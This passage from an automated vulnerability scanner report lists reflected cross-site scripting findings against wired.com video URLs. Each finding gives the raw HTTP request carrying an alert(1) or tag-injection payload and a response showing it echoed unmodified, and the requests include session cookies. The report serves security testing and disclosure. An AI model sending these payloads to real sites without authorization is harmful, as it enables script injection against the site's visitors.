<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "171644057468f9c"-alert(1)-"1deb7ddd208","latest-videos","664893966001","highlights","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.962. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69d61"-alert(1)-"8d2a6e6c54f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan69d61"-alert(1)-"8d2a6e6c54f/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:00 GMT
Date: Mon, 22 Nov 2010 00:49:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","664893966001","call-of-duty--afghanistan69d61"-alert(1)-"8d2a6e6c54f","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.963. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c3a"-alert(1)-"d453e615d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/66489396600136c3a"-alert(1)-"d453e615d9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:54:11 GMT
Date: Mon, 22 Nov 2010 00:49:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","66489396600136c3a"-alert(1)-"d453e615d9","1716440574","highlights","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.964. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd83"><a>ad70241ee00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video4fd83"><a>ad70241ee00/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29456
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Mon, 22 Nov 2010 00:46:40 GMT
Date: Mon, 22 Nov 2010 00:42:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video4fd83"><a>ad70241ee00 ss_latest-videos c_highlights">
...[SNIP]...

1.965. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e30a8--><script>alert(1)</script>a31e866130d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoe30a8--><script>alert(1)</script>a31e866130d/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29491
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:56 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoe30a8--><script>alert(1)</script>a31e866130d/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001
-->
...[SNIP]...

1.966. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 332c2"><a>91f441f5d3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos332c2"><a>91f441f5d3c/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:56 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos332c2"><a>91f441f5d3c c_highlights">
...[SNIP]...

1.967. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b06d"-alert(1)-"2d478deefda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos1b06d"-alert(1)-"2d478deefda/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:48:50 GMT
Date: Mon, 22 Nov 2010 00:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos1b06d"-alert(1)-"2d478deefda","678922783001","cast-and-crew-talk-tron-reboot-secondskin-light-suits","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.968. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e351"-alert(1)-"ee6ab5df533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights1e351"-alert(1)-"ee6ab5df533/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:38 GMT
Date: Mon, 22 Nov 2010 00:45:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","678922783001","highlights1e351"-alert(1)-"ee6ab5df533","cast-and-crew-talk-tron-reboot-secondskin-light-suits","1716440574","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.969. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f2"><a>756b85c7199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlightsd18f2"><a>756b85c7199/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:48:57 GMT
Date: Mon, 22 Nov 2010 00:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106777


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlightsd18f2"><a>756b85c7199">
...[SNIP]...

1.970. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39664"-alert(1)-"96d7430c046 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/171644057439664"-alert(1)-"96d7430c046/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:18 GMT
Date: Mon, 22 Nov 2010 00:46:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106808


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "171644057439664"-alert(1)-"96d7430c046","latest-videos","678922783001","cast-and-crew-talk-tron-reboot-secondskin-light-suits","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.971. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab2ab"-alert(1)-"be5e8af1f82 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suitsab2ab"-alert(1)-"be5e8af1f82/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:51:08 GMT
Date: Mon, 22 Nov 2010 00:46:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cast-and-crew-talk-tron-reboot-secondskin-light-suitsab2ab"-alert(1)-"be5e8af1f82","latest-videos","678922783001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.972. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72896"-alert(1)-"e1d2c6c34d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/67892278300172896"-alert(1)-"e1d2c6c34d2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:51:42 GMT
Date: Mon, 22 Nov 2010 00:46:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","67892278300172896"-alert(1)-"e1d2c6c34d2","cast-and-crew-talk-tron-reboot-secondskin-light-suits","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.973. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2096"><a>cac0c655b17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2096"><a>cac0c655b17/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29429
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:59 GMT
Date: Mon, 22 Nov 2010 00:40:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2096"><a>cac0c655b17 ss_latest-videos c_highlights">
...[SNIP]...

1.974. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8cb5c--><script>alert(1)</script>495ed423392 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video8cb5c--><script>alert(1)</script>495ed423392/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29464
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:17 GMT
Date: Mon, 22 Nov 2010 00:42:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video8cb5c--><script>alert(1)</script>495ed423392/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001
-->
...[SNIP]...

